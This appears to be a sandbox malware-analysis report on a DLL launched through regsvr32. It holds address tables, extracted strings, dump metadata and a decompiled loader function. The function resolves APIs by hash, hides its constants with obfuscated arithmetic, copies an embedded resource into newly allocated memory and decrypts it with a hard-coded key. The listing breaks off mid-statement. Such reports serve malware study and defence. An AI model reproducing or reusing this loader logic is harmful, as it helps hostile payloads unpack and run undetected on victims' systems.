0x100136fb
0x100136fd
0x00000000
0x00000000
0x10013703
0x00000000
0x10013703
0x100136c1
0x100136c7
0x10013cc1
0x00000000
0x10013cc6
0x100136cd
0x100136d3
0x00000000
0x00000000
0x100136e0
0x100136e5
0x00000000
0x100136e5
0x100133f1
0x1001368b
0x10013692
0x10013697
0x00000000
0x10013697
0x100133f7
0x100133fd
0x10013551
0x10013557
0x100135cc
0x100135ee
0x100135fe
0x1001362a
0x10013636
0x1001365a
0x10013660
0x10013677
0x1001367e
0x10013683
0x00000000
0x10013683
0x10013559
0x1001355f
0x10013cac
0x00000000
0x10013cac
0x10013565
0x1001356b
0x1001358a
0x1001358f
0x10013591
0x00000000
0x00000000
0x10013597
0x00000000
0x10013597
0x1001356d
0x10013573
0x00000000
0x00000000
0x10013579
0x00000000
0x10013579
0x10013403
0x100134f1
0x100134f8
0x1001354a
0x1001354a
0x00000000
0x1001354a
0x10013514
0x10013523
0x10013528
0x1001352b
0x10013532
0x10013545
0x00000000
0x10013545
0x10013534
0x00000000
0x10013534
0x1001340f
0x100134ca
0x100134d9
0x100134df
0x100134e0
0x100134e7
0x00000000
0x100134e7
0x1001341b
0x100134a5
0x100134aa
0x100134ab
0x00000000
0x100134ab
0x10013423
0x1001346d
0x10013474
0x10013479
0x10013480
0x10013488
0x00000000
0x10013488
0x1001342b
0x00000000
0x00000000
0x10013438
0x1001343f
0x00000000
0x10013445
0x10013445
0x00000000
0x10013445
0x10013884
0x10013884
0x1001388a
0x10013b04
0x10013b0a
0x10013c21
0x10013c23
0x10013c8b
0x10013c92
0x00000000
0x10013c92
0x10013c25
0x10013c2b
0x10013c60
0x10013c65
0x00000000
0x10013c65
0x10013c2d
0x10013c33
0x00000000
0x00000000
0x10013c43
0x10013c48
0x10013c4f
0x00000000
0x10013c4f
0x10013b10
0x10013c0c
0x10013c13
0x10013c15
0x00000000
0x10013c15
0x10013b16
0x10013b1c
0x10013bf3
0x10013c01
0x10013c06
0x00000000
0x10013c06
0x10013b22
0x10013b28
0x10013bdd
0x10013be2
0x00000000
0x10013be2
0x10013b2e
0x10013b34
0x10013b7f
0x10013b84
0x10013b86
0x10013bba
0x10013bc3
0x10013bcb
0x00000000
0x10013bcb
0x10013b96
0x10013b9f
0x10013ba1
0x00000000
0x10013ba1
0x10013b36
0x10013b3c
0x00000000
0x00000000
0x10013b49
0x10013b5c
0x10013b65
0x10013b6d
0x00000000
0x10013b6d
0x10013890
0x10013af5
0x10013afa
0x00000000
0x10013afa
0x10013896
0x1001389c
0x100139c0
0x100139c6
0x10013ad2
0x10013adb
0x10013ae3
0x00000000
0x10013ae3
0x100139cc
0x100139d2
0x10013aae
0x10013ab3
0x10013aba
0x00000000
0x10013aba
0x100139d8
0x100139de
0x10013a91
0x10013a96
0x10013a9d
0x00000000
0x10013a9d
0x100139e4
0x100139ea
0x00000000
0x00000000
0x10013a15
0x10013a1c
0x10013a21
0x10013a24
0x10013a26
0x10013a5d
0x10013a64
0x10013a67
0x10013a73
0x10013a75
0x10013a80
0x10013a80
0x00000000
0x10013a80
0x10013a77
0x10013a7a
0x00000000
0x00000000
0x00000000
0x10013a7a
0x10013a69
0x00000000
0x10013a69
0x10013a42
0x10013a4c
0x10013a51
0x10013a54
0x10013a56
0x00000000
0x10013a56
0x100138a2
0x10013933
0x10013939
0x1001393a
0x1001393c
0x10013944
0x1001394b
0x1001394d
0x10013966
0x10013975
0x10013977
0x1001397a
0x1001397a
0x10013981
0x10013984
0x100139a3
0x100139aa
0x100139af
0x100139b2
0x100139b2
0x1001393e
0x1001393e
0x1001393e
0x100139b4
0x100139b6
0x00000000
0x100139b6
0x100138a4
0x100138aa
0x10013cd0
0x00000000
0x10013cd0
0x100138b0
0x100138b6
0x10013903
0x10013908
0x1001390a
0x00000000
0x00000000
0x10013910
0x00000000
0x10013910
0x100138b8
0x100138be
0x100138ed
0x100138f2
0x00000000
0x100138f2
0x100138c0
0x100138c6
0x00000000
0x00000000
0x100138d0
0x100138d5
0x100138d5
0x10013c97
0x10013c97
0x00000000

Strings

!), xrefs: 100129A7
5gh, xrefs: 10012C9B
<~, xrefs: 10013832
w,, xrefs: 100127DA
~, xrefs: 100131B8
&u, xrefs: 100133A8
E[f!, xrefs: 100123A0
M+, xrefs: 10012E4A
M+, xrefs: 10013957
<!o, xrefs: 100125A7
x_X, xrefs: 100135EE
h;D, xrefs: 10012C6A
vTd, xrefs: 10013275
T, xrefs: 10012A32
Y, xrefs: 10012543
|, xrefs: 1001218E
ge, xrefs: 100122C5
i?p<, xrefs: 10012C36

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <~$Y$&u$5gh$<!o$E[f!$M+$M+$h;D$i?p<$vTd$w,$x_X$!)$T$ge$|$~
API String ID: 0-880939166
Opcode ID: 54eeeb25a6f8219093409e9094c5909dd58f3d75a2c0b847b0006f55d524a705
Instruction ID: 111092fcffbd467967b67195a0ae5c072f2317053e2eb8ac8c71fb463c90d4ba
Opcode Fuzzy Hash: 54eeeb25a6f8219093409e9094c5909dd58f3d75a2c0b847b0006f55d524a705
Instruction Fuzzy Hash: 3DD2F2719093818BD3B4CF25C58ABCFBBE1FB84354F10891DE5D99A260DBB19989CF42

Uniqueness

Uniqueness Score: -1.00%

Function 6DA3BAD0 Relevance: 18.5, APIs: 9, Strings: 1, Instructions: 985
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E6DA3BAD0(void* __ebx, void* __edx, void* __edi, void* __esi, struct HINSTANCE__* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				void* _v16;
				WCHAR* _v20;
				void* _v24;
				signed int _v28;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				char _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				char _v72;
				void* _v76;
				void* _v80;
				long _v84;
				void* _v88;
				struct HRSRC__* _v92;
				signed short _v96;
				intOrPtr _v100;
				void* __ebp;
				signed int _t93;
				long _t96;
				void* _t98;
				intOrPtr _t140;
				struct HRSRC__* _t142;
				signed int _t151;
				signed int _t153;
				signed int _t155;
				signed int _t166;
				signed int _t168;
				signed int _t170;
				signed int _t181;
				signed int _t183;
				signed int _t185;
				signed int _t196;
				signed int _t198;
				signed int _t200;
				signed int _t211;
				signed int _t213;
				signed int _t215;
				signed int _t222;
				signed int _t224;
				signed int _t226;
				signed int _t248;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t256;
				signed int _t258;
				long _t265;
				void* _t270;
				signed int _t271;
				signed int _t274;
				signed int _t277;
				signed int _t279;
				signed int _t296;
				signed int _t299;
				signed int _t301;
				signed int _t303;
				signed int _t306;
				signed int _t308;
				signed int _t325;
				intOrPtr _t333;
				signed int _t340;
				signed int _t342;
				signed int _t344;
				signed int _t347;
				signed int _t349;
				signed int _t352;
				signed int _t381;
				void* _t383;
				signed int _t405;
				signed int _t414;
				signed int _t423;
				signed int _t432;
				signed int _t441;
				signed int _t468;
				signed int _t470;
				signed int _t472;
				signed int _t474;
				signed int _t476;
				signed int _t478;
				signed int _t500;
				signed int _t521;
				signed int _t523;
				signed int _t525;
				signed int _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				signed int _t542;
				signed int _t544;
				signed int _t561;
				signed int _t564;
				signed int _t566;
				signed int _t568;
				signed int _t573;
				signed int _t594;
				signed int _t596;
				signed int _t598;
				signed int _t601;
				signed int _t603;
				signed int _t606;
				signed int _t609;
				signed int _t611;
				signed int _t614;
				signed int _t617;
				signed int _t619;
				signed int _t621;
				signed int _t623;
				signed int _t625;
				signed int _t627;
				signed int _t629;
				signed int _t631;
				signed int _t633;
				signed int _t635;
				signed int _t637;
				signed int _t639;
				signed int _t660;
				signed int _t662;
				signed int _t665;
				signed int _t667;
				signed int _t669;
				signed int _t672;
				signed int _t674;
				signed int _t676;
				signed int _t679;
				signed int _t681;
				signed int _t683;
				signed int _t686;
				signed int _t688;
				signed int _t690;
				signed int _t693;
				signed int _t695;
				signed int _t697;
				signed int _t699;
				signed int _t701;
				signed int _t703;
				signed int _t705;
				signed int _t727;
				signed int _t729;
				signed int _t731;
				signed int _t733;
				signed int _t734;
				signed int _t736;
				signed int _t739;
				signed int _t741;
				signed int _t754;
				signed int _t756;
				signed int _t758;
				signed int _t761;
				signed int _t763;
				signed int _t780;
				signed int _t783;
				signed int _t785;
				signed int _t787;
				signed int _t790;
				signed int _t792;
				signed int _t805;
				signed int _t807;
				signed int _t810;
				signed int _t813;
				signed int _t831;
				signed int _t834;
				signed int _t836;
				signed int _t839;
				signed int _t842;
				signed int _t844;
				signed int _t873;
				void* _t874;
				void* _t901;

				_t872 = __esi;
				_t871 = __edi;
				_t641 = __edx;
				_t384 = __ebx;
				_t93 =  *0x6da82744; // 0x616b45bb
				_v28 = _t93 ^ _t873;
				_v100 = _a8;
				if(_v100 == 1) {
					_v8 = 0;
					_v84 = 0;
					_v76 = 0;
					_v80 = 0;
					_v16 = 0;
					_v12 = 0;
					_v92 = 0;
					_v88 = 0;
					_v96 = 0x3e1;
					_v20 = 0x6da71748;
					_t96 = E6DA3BA30(__esi, __eflags); // executed
					__eflags = _t96;
					if(__eflags != 0) {
						_push(0x6da71754);
						E6DA5AC00(__ebx, _t641, __edi, __esi, __eflags);
						_t98 = 0;
					} else {
						 *0x6da8125c = 0;
						 *0x6da81260 = 0;
						 *0x6da81264 = 0;
						 *0x6da8126c = 0;
						 *0x6da81268 = 0;
						 *0x6da81270 = 0;
						 *0x6da81274 = 0;
						_v72 = 0x6e;
						_v70 = 0x74;
						_v68 = 0x64;
						_v66 = 0x6c;
						_v64 = 0x6c;
						_v62 = 0x2e;
						_v60 = 0x64;
						_v58 = 0x6c;
						_v56 = 0x6c;
						_v54 = 0;
						_v52 = 0x6d;
						_v50 = 0x73;
						_v48 = 0x76;
						_v46 = 0x63;
						_v44 = 0x72;
						_v42 = 0x74;
						_v40 = 0x2e;
						_v38 = 0x64;
						_v36 = 0x6c;
						_v34 = 0x6c;
						_v32 = 0;
						_v76 = E6DA26560(L"kernel32.dll");
						_v80 = E6DA26560( &_v72);
						_v16 = E6DA26560( &_v52);
						 *0x6da83d5c = E6DA272D0(_v16, 0x429144a2);
						 *0x6da83d58 = E6DA272D0(_v16, 0x43d9449e);
						 *0x6da83d4c = E6DA272D0(_v16, 0xb63d35fd);
						 *0x6da83d3c = E6DA272D0(_v16, 0xd0aa454c);
						 *0x6da83d50 = E6DA272D0(_v16, 0x2d39862a);
						 *0x6da83d68 = E6DA272D0(_v16, 0x44998278);
						 *0x6da83d14 = E6DA272D0(_v16, 0x44418673);
						 *0x6da83d18 = E6DA272D0(_v76, 0x5843df54);
						 *0x6da83d24 = E6DA272D0(_v76, 0x3ef37797);
						 *0x6da83d40 = E6DA272D0(_v76, 0x6a5cddaa);
						 *0x6da83d38 = E6DA272D0(_v76, 0x99848b3);
						 *0x6da83d34 = E6DA272D0(_v76, 0x4018d91b);
						 *0x6da83d44 = E6DA272D0(_v76, 0x42e00fb2);
						 *0x6da83d6c = E6DA272D0(_v76, 0x14dbeaa7);
						 *0x6da83d28 = E6DA272D0(_v76, 0xd35db25d);
						 *0x6da83d20 = E6DA272D0(_v80, 0x34ab3826);
						 *0x6da83d64 = E6DA272D0(_v76, 0x37563f1e);
						 *0x6da83d60 = E6DA272D0(_v76, 0xae60ffb6);
						 *0x6da83d48 = E6DA272D0(_v76, 0x35955e42);
						 *0x6da83d1c = E6DA272D0(_v76, 0xb2a067ae);
						 *0x6da83d54 = E6DA272D0(_v76, 0x2222af8a);
						 *0x6da83d30 = E6DA272D0(_v76, 0x59e0387b);
						_t140 = E6DA272D0(_v76, 0x57cad08);
						_t901 = _t874 + 0xc4;
						 *0x6da83d2c = _t140;
						_t142 = FindResourceW(_a4, _v96 & 0x0000ffff, _v20); // executed
						_v92 = _t142;
						_v88 = LoadResource(_a4, _v92);
						_v84 = SizeofResource(_a4, _v92);
						__eflags =  *0x6da83d24;
						if( *0x6da83d24 == 0) {
							_t405 =  *0x6da81260; // 0x0
							_t660 =  *0x6da8126c; // 0x0
							_t151 =  *0x6da81268; // 0x0
							_t662 =  *0x6da8126c; // 0x0
							_t153 =  *0x6da81268; // 0x0
							_t665 =  *0x6da81270; // 0x0
							_t155 =  *0x6da8126c; // 0x0
							_t414 =  *0x6da81260; // 0x0
							_t667 =  *0x6da8126c; // 0x0
							_t166 =  *0x6da81268; // 0x0
							_t669 =  *0x6da8126c; // 0x0
							_t168 =  *0x6da81268; // 0x0
							_t672 =  *0x6da81270; // 0x0
							_t170 =  *0x6da8126c; // 0x0
							_t423 =  *0x6da81260; // 0x0
							_t674 =  *0x6da8126c; // 0x0
							_t181 =  *0x6da81268; // 0x0
							_t676 =  *0x6da8126c; // 0x0
							_t183 =  *0x6da81268; // 0x0
							_t679 =  *0x6da81270; // 0x0
							_t185 =  *0x6da8126c; // 0x0
							_t432 =  *0x6da81260; // 0x0
							_t681 =  *0x6da8126c; // 0x0
							_t196 =  *0x6da81268; // 0x0
							_t683 =  *0x6da8126c; // 0x0
							_t198 =  *0x6da81268; // 0x0
							_t686 =  *0x6da81270; // 0x0
							_t200 =  *0x6da8126c; // 0x0
							_t441 =  *0x6da81260; // 0x0
							_t688 =  *0x6da8126c; // 0x0
							_t211 =  *0x6da81268; // 0x0
							_t690 =  *0x6da8126c; // 0x0
							_t213 =  *0x6da81268; // 0x0
							_t693 =  *0x6da81270; // 0x0
							_t215 =  *0x6da8126c; // 0x0
							_t695 =  *0x6da81268; // 0x0
							_t222 =  *0x6da81260; // 0x0
							_t697 =  *0x6da81264; // 0x0
							_t224 =  *0x6da81260; // 0x0
							_t699 =  *0x6da81264; // 0x0
							_t226 =  *0x6da81264; // 0x0
							_t468 =  *0x6da81268; // 0x0
							_t701 =  *0x6da81260; // 0x0
							_t470 =  *0x6da81264; // 0x0
							_t703 =  *0x6da81260; // 0x0
							_t472 =  *0x6da81264; // 0x0
							_t705 =  *0x6da81264; // 0x0
							_t248 =  *0x6da81268; // 0x0
							_t474 =  *0x6da81260; // 0x0
							_t250 =  *0x6da81264; // 0x0
							_t476 =  *0x6da81260; // 0x0
							_t252 =  *0x6da81264; // 0x0
							_t478 =  *0x6da81264; // 0x0
							_t727 =  *0x6da81268; // 0x0
							_t254 =  *0x6da81260; // 0x0
							_t729 =  *0x6da81264; // 0x0
							_t256 =  *0x6da81260; // 0x0
							_t731 =  *0x6da81264; // 0x0
							_t258 =  *0x6da81264; // 0x0
							_t500 =  *0x6da8125c; // 0x0
							_t733 =  *0x6da81260; // 0x0
							_t77 = _t500 + 0x2000; // 0x2000
							_t734 =  *0x6da8125c; // 0x0
							_t736 =  *0x6da81264; // 0x0
							_t739 =  *0x6da8125c; // 0x0
							_t741 =  *0x6da81264; // 0x0
							_t265 = _t258 *  *0x6da81260 + _t478 *  *0x6da81260 + _t705 *  *0x6da81260 + _t226 *  *0x6da81260 + 0x00001000 -  *0x6da81260 - _t695 *  *0x6da81264 -  *0x6da81264 + _t222 *  *0x6da81264 + _t697 *  *0x6da8125c -  *0x6da81260 -  *0x6da8126c -  *0x6da81260 -  *0x6da81260 + _t224 *  *0x6da8125c -  *0x6da81260 + _t699 *  *0x6da81270 -  *0x6da8126c -  *0x6da81260 -  *0x6da81270 +  *0x6da81268 +  *0x6da81260 -  *0x6da81260 +  *0x6da81270 +  *0x6da81264 - _t468 *  *0x6da81264 -  *0x6da81264 + _t701 *  *0x6da81264 + _t470 *  *0x6da8125c -  *0x6da81260 -  *0x6da8126c -  *0x6da81260 -  *0x6da81260 + _t703 *  *0x6da8125c -  *0x6da81260 + _t472 *  *0x6da81270 -  *0x6da8126c -  *0x6da81260 -  *0x6da81270 +  *0x6da81268 +  *0x6da81260 -  *0x6da81260 +  *0x6da81270 +  *0x6da81264 - _t248 *  *0x6da81264 -  *0x6da81264 + _t474 *  *0x6da81264 + _t250 *  *0x6da8125c -  *0x6da81260 -  *0x6da8126c -  *0x6da81260 -  *0x6da81260 + _t476 *  *0x6da8125c -  *0x6da81260 + _t252 *  *0x6da81270 -  *0x6da8126c -  *0x6da81260 -  *0x6da81270 +  *0x6da81268 +  *0x6da81260 -  *0x6da81260 +  *0x6da81270 +  *0x6da81264 - _t727 *  *0x6da81264 -  *0x6da81264 + _t254 *  *0x6da81264 + _t729 *  *0x6da8125c -  *0x6da81260 -  *0x6da8126c -  *0x6da81260 -  *0x6da81260 + _t256 *  *0x6da8125c -  *0x6da81260 + _t731 *  *0x6da81270 -  *0x6da8126c -  *0x6da81260 -  *0x6da81270 +  *0x6da81268 +  *0x6da81260 -  *0x6da81260 +  *0x6da81270 +  *0x6da81264 +  *0x6da81260 | _t733 + _t77 +  *0x6da81268 -  *0x6da81260 +  *0x6da81264 +  *0x6da81260 -  *0x6da81270 + _t734 *  *0x6da8126c + _t736 *  *0x6da8125c *  *0x6da81268 -  *0x6da8126c +  *0x6da81260 +  *0x6da8125c +  *0x6da81268 -  *0x6da81260 +  *0x6da81264 +  *0x6da81260 -  *0x6da81270 + _t739 *  *0x6da8126c + _t741 *  *0x6da8125c *  *0x6da81268 -  *0x6da8126c;
							__eflags = _t265;
							_v12 = VirtualAlloc(0, _v84, _t265, _t215 *  *0x6da8125c *  *0x6da8126c *  *0x6da8125c *  *0x6da8125c *  *0x6da8126c + _t441 *  *0x6da81260 + _t200 *  *0x6da8125c *  *0x6da8126c *  *0x6da8125c *  *0x6da8125c *  *0x6da8126c + _t432 *  *0x6da81260 + _t185 *  *0x6da8125c *  *0x6da8126c *  *0x6da8125c *  *0x6da8125c *  *0x6da8126c + _t423 *  *0x6da81260 + _t170 *  *0x6da8125c *  *0x6da8126c *  *0x6da8125c *  *0x6da8125c *  *0x6da8126c + _t414 *  *0x6da81260 + _t155 *  *0x6da8125c *  *0x6da8126c *  *0x6da8125c *  *0x6da8125c *  *0x6da8126c + _t405 *  *0x6da81260 + 0x40 -  *0x6da81268 -  *0x6da81260 -  *0x6da8126c +  *0x6da81268 + _t660 *  *0x6da81260 + _t151 *  *0x6da8125c + _t662 *  *0x6da81260 *  *0x6da8126c + _t153 *  *0x6da81260 - _t665 *  *0x6da81264 +  *0x6da8126c -  *0x6da81268 -  *0x6da81260 -  *0x6da8126c +  *0x6da81268 + _t667 *  *0x6da81260 + _t166 *  *0x6da8125c + _t669 *  *0x6da81260 *  *0x6da8126c + _t168 *  *0x6da81260 - _t672 *  *0x6da81264 +  *0x6da8126c -  *0x6da81268 -  *0x6da81260 -  *0x6da8126c +  *0x6da81268 + _t674 *  *0x6da81260 + _t181 *  *0x6da8125c + _t676 *  *0x6da81260 *  *0x6da8126c + _t183 *  *0x6da81260 - _t679 *  *0x6da81264 +  *0x6da8126c -  *0x6da81268 -  *0x6da81260 -  *0x6da8126c +  *0x6da81268 + _t681 *  *0x6da81260 + _t196 *  *0x6da8125c + _t683 *  *0x6da81260 *  *0x6da8126c + _t198 *  *0x6da81260 - _t686 *  *0x6da81264 +  *0x6da8126c -  *0x6da81268 -  *0x6da81260 -  *0x6da8126c +  *0x6da81268 + _t688 *  *0x6da81260 + _t211 *  *0x6da8125c + _t690 *  *0x6da81260 *  *0x6da8126c + _t213 *  *0x6da81260 - _t693 *  *0x6da81264 +  *0x6da8126c);
						} else {
							_t573 =  *0x6da81264; // 0x0
							_t805 =  *0x6da81264; // 0x0
							_t340 =  *0x6da81260; // 0x0
							_t807 =  *0x6da81270; // 0x0
							_t342 =  *0x6da81264; // 0x0
							_t810 =  *0x6da81268; // 0x0
							_t344 =  *0x6da81270; // 0x0
							_t813 =  *0x6da81264; // 0x0
							_t347 =  *0x6da81264; // 0x0
							_t594 =  *0x6da81260; // 0x0
							_t349 =  *0x6da81270; // 0x0
							_t596 =  *0x6da81264; // 0x0
							_t352 =  *0x6da81268; // 0x0
							_t598 =  *0x6da81270; // 0x0
							_t831 =  *0x6da8126c; // 0x0
							_t601 =  *0x6da81270; // 0x0
							_t834 =  *0x6da81270; // 0x0
							_t603 =  *0x6da8126c; // 0x0
							_t836 =  *0x6da81270; // 0x0
							_t606 =  *0x6da81270; // 0x0
							_t839 =  *0x6da8126c; // 0x0
							_t609 =  *0x6da81270; // 0x0
							_t842 =  *0x6da81270; // 0x0
							_t611 =  *0x6da8126c; // 0x0
							_t844 =  *0x6da81270; // 0x0
							_t614 =  *0x6da81270; // 0x0
							_t617 =  *0x6da81260; // 0x0
							_t619 =  *0x6da8126c; // 0x0
							_t621 =  *0x6da81268; // 0x0
							_t623 =  *0x6da8125c; // 0x0
							_t625 =  *0x6da81268; // 0x0
							_t627 =  *0x6da8126c; // 0x0
							_t629 =  *0x6da81260; // 0x0
							_t631 =  *0x6da8126c; // 0x0
							_t633 =  *0x6da81268; // 0x0
							_t635 =  *0x6da8125c; // 0x0
							_t637 =  *0x6da81268; // 0x0
							_t639 =  *0x6da8126c; // 0x0
							_t381 = E6DA5ABF5();
							_t901 = _t901 + 4;
							_t383 =  *0x6da83d24( ~_t381, "1", 0, _v84, 0x00001000 - _t831 *  *0x6da81260 *  *0x6da8126c - _t601 *  *0x6da8126c +  *0x6da81264 + _t834 *  *0x6da8126c + _t603 *  *0x6da8125c *  *0x6da81264 -  *0x6da81270 - _t836 *  *0x6da8125c *  *0x6da81268 -  *0x6da81264 -  *0x6da81270 -  *0x6da81260 -  *0x6da81260 - _t606 *  *0x6da81260 *  *0x6da81260 - _t839 *  *0x6da81260 *  *0x6da8126c - _t609 *  *0x6da8126c +  *0x6da81264 + _t842 *  *0x6da8126c + _t611 *  *0x6da8125c *  *0x6da81264 -  *0x6da81270 - _t844 *  *0x6da8125c *  *0x6da81268 -  *0x6da81264 -  *0x6da81270 -  *0x6da81260 -  *0x6da81260 - _t614 *  *0x6da81260 *  *0x6da81260 | 0x00002000 -  *0x6da81268 +  *0x6da8126c +  *0x6da81260 - _t617 *  *0x6da8125c +  *0x6da81270 - _t619 *  *0x6da81260 - _t621 *  *0x6da81264 + _t623 *  *0x6da81264 + _t625 *  *0x6da81264 - _t627 *  *0x6da8126c +  *0x6da81270 -  *0x6da81268 +  *0x6da8126c +  *0x6da81260 - _t629 *  *0x6da8125c +  *0x6da81270 - _t631 *  *0x6da81260 - _t633 *  *0x6da81264 + _t635 *  *0x6da81264 + _t637 *  *0x6da81264 - _t639 *  *0x6da8126c +  *0x6da81270, _t813 *  *0x6da81260 + _t573 *  *0x6da81260 + 0x40 -  *0x6da81268 -  *0x6da81260 +  *0x6da81264 -  *0x6da81260 -  *0x6da8126c -  *0x6da81260 -  *0x6da81268 - _t805 *  *0x6da81260 + _t340 *  *0x6da8126c -  *0x6da8126c -  *0x6da81270 -  *0x6da81264 - _t807 *  *0x6da8125c *  *0x6da8125c -  *0x6da81268 + _t342 *  *0x6da81264 - _t810 *  *0x6da81264 *  *0x6da81260 -  *0x6da81260 - _t344 *  *0x6da81270 *  *0x6da81270 -  *0x6da81268 -  *0x6da81260 +  *0x6da81264 -  *0x6da81260 -  *0x6da8126c -  *0x6da81260 -  *0x6da81268 - _t347 *  *0x6da81260 + _t594 *  *0x6da8126c -  *0x6da8126c -  *0x6da81270 -  *0x6da81264 - _t349 *  *0x6da8125c *  *0x6da8125c -  *0x6da81268 + _t596 *  *0x6da81264 - _t352 *  *0x6da81264 *  *0x6da81260 -  *0x6da81260 - _t598 *  *0x6da81270 *  *0x6da81270, 0); // executed
							_v12 = _t383;
						}
						memcpy(_v12, _v88, _v84);
						_t270 = malloc(0x1df7); // executed
						_v24 = _t270;
						_t521 =  *0x6da8125c; // 0x0
						_t271 =  *0x6da81270; // 0x0
						_t523 =  *0x6da8125c; // 0x0
						_t274 =  *0x6da81270; // 0x0
						_t525 =  *0x6da81268; // 0x0
						_t754 =  *0x6da81260; // 0x0
						_t277 =  *0x6da81270; // 0x0
						_t756 =  *0x6da81260; // 0x0
						_t279 =  *0x6da81264; // 0x0
						_t532 =  *0x6da81268; // 0x0
						_t758 =  *0x6da8126c; // 0x0
						_t535 =  *0x6da81260; // 0x0
						_t761 =  *0x6da81270; // 0x0
						_t537 =  *0x6da81260; // 0x0
						_t763 =  *0x6da81264; // 0x0
						_t296 =  *0x6da81268; // 0x0
						_t539 =  *0x6da8126c; // 0x0
						_t299 =  *0x6da81260; // 0x0
						_t542 =  *0x6da81270; // 0x0
						_t301 =  *0x6da81260; // 0x0
						_t544 =  *0x6da81264; // 0x0
						_t780 =  *0x6da81268; // 0x0
						_t303 =  *0x6da8126c; // 0x0
						_t783 =  *0x6da81260; // 0x0
						_t306 =  *0x6da81270; // 0x0
						_t785 =  *0x6da81260; // 0x0
						_t308 =  *0x6da81264; // 0x0
						_t561 =  *0x6da81268; // 0x0
						_t787 =  *0x6da8126c; // 0x0
						_t564 =  *0x6da81260; // 0x0
						_t790 =  *0x6da81270; // 0x0
						_t566 =  *0x6da81260; // 0x0
						_t792 =  *0x6da81264; // 0x0
						_t325 =  *0x6da81268; // 0x0
						_t568 =  *0x6da8126c; // 0x0
						__eflags = _t792 *  *0x6da81260 + _t308 *  *0x6da81260 + _t544 *  *0x6da81260 + _t763 *  *0x6da81260 + _t279 *  *0x6da81260 + _t525 + "rJ_9IH+4mllGb3%jBW$k%a15sE<xu5R@K8D!ltyrHmn6QGp?ZelMJ0itJlYMeFENg#tg_NrFEi0WkFzcR1j7rw+>a!d$fim#zMFQ4qQo$wcbISt" - _t754 *  *0x6da8125c +  *0x6da81264 - _t277 *  *0x6da81260 + _t756 *  *0x6da81264 +  *0x6da8125c - _t532 *  *0x6da8126c *  *0x6da81260 + _t758 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 -  *0x6da81268 +  *0x6da81264 -  *0x6da81270 -  *0x6da81270 -  *0x6da81264 +  *0x6da81268 - _t535 *  *0x6da8125c +  *0x6da81264 - _t761 *  *0x6da81260 + _t537 *  *0x6da81264 +  *0x6da8125c - _t296 *  *0x6da8126c *  *0x6da81260 + _t539 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 -  *0x6da81268 +  *0x6da81264 -  *0x6da81270 -  *0x6da81270 -  *0x6da81264 +  *0x6da81268 - _t299 *  *0x6da8125c +  *0x6da81264 - _t542 *  *0x6da81260 + _t301 *  *0x6da81264 +  *0x6da8125c - _t780 *  *0x6da8126c *  *0x6da81260 + _t303 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 -  *0x6da81268 +  *0x6da81264 -  *0x6da81270 -  *0x6da81270 -  *0x6da81264 +  *0x6da81268 - _t783 *  *0x6da8125c +  *0x6da81264 - _t306 *  *0x6da81260 + _t785 *  *0x6da81264 +  *0x6da8125c - _t561 *  *0x6da8126c *  *0x6da81260 + _t787 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 -  *0x6da81268 +  *0x6da81264 -  *0x6da81270 -  *0x6da81270 -  *0x6da81264 +  *0x6da81268 - _t564 *  *0x6da8125c +  *0x6da81264 - _t790 *  *0x6da81260 + _t566 *  *0x6da81264 +  *0x6da8125c - _t325 *  *0x6da8126c *  *0x6da81260 + _t568 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 -  *0x6da81268 +  *0x6da81264 -  *0x6da81270 -  *0x6da81270 -  *0x6da81264;
						E6DA28380(_v24, _t792 *  *0x6da81260 + _t308 *  *0x6da81260 + _t544 *  *0x6da81260 + _t763 *  *0x6da81260 + _t279 *  *0x6da81260 + _t525 + "rJ_9IH+4mllGb3%jBW$k%a15sE<xu5R@K8D!ltyrHmn6QGp?ZelMJ0itJlYMeFENg#tg_NrFEi0WkFzcR1j7rw+>a!d$fim#zMFQ4qQo$wcbISt" - _t754 *  *0x6da8125c +  *0x6da81264 - _t277 *  *0x6da81260 + _t756 *  *0x6da81264 +  *0x6da8125c - _t532 *  *0x6da8126c *  *0x6da81260 + _t758 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 -  *0x6da81268 +  *0x6da81264 -  *0x6da81270 -  *0x6da81270 -  *0x6da81264 +  *0x6da81268 - _t535 *  *0x6da8125c +  *0x6da81264 - _t761 *  *0x6da81260 + _t537 *  *0x6da81264 +  *0x6da8125c - _t296 *  *0x6da8126c *  *0x6da81260 + _t539 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 -  *0x6da81268 +  *0x6da81264 -  *0x6da81270 -  *0x6da81270 -  *0x6da81264 +  *0x6da81268 - _t299 *  *0x6da8125c +  *0x6da81264 - _t542 *  *0x6da81260 + _t301 *  *0x6da81264 +  *0x6da8125c - _t780 *  *0x6da8126c *  *0x6da81260 + _t303 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 -  *0x6da81268 +  *0x6da81264 -  *0x6da81270 -  *0x6da81270 -  *0x6da81264 +  *0x6da81268 - _t783 *  *0x6da8125c +  *0x6da81264 - _t306 *  *0x6da81260 + _t785 *  *0x6da81264 +  *0x6da8125c - _t561 *  *0x6da8126c *  *0x6da81260 + _t787 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 -  *0x6da81268 +  *0x6da81264 -  *0x6da81270 -  *0x6da81270 -  *0x6da81264 +  *0x6da81268 - _t564 *  *0x6da8125c +  *0x6da81264 - _t790 *  *0x6da81260 + _t566 *  